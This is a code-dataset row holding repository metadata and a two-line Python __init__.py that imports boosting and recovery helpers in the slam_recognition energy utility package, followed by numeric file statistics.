] | 5 | 2018-11-18T17:35:59.000Z | 2019-02-13T20:25:58.000Z | slam_recognition/util/energy/__init__.py | SimLeek/slam_recognition | feec2d1fb654d7c8dc25f610916f4e9b202a1092 | [
"Apache-2.0",
"MIT"
] | 12 | 2018-10-31T01:57:55.000Z | 2019-02-07T05:49:36.000Z | slam_recognition/util/energy/__init__.py | SimLeek/pySILEnT | feec2d1fb654d7c8dc25f610916f4e9b202a1092 | [
"Apache-2.0",
"MIT"
] | null | null | null | from .boosting import initialize_boosting, get_boosting
from .recovery import generate_constant_recovery, generate_input_based_recovery, generate_recovery
| 51.666667 | 98 | 0.896774 | 19 | 155 | 6.894737 | 0.526316 | 0.244275 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.070968 | 155 | 2 | 99 | 77.5 | 0.909722 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.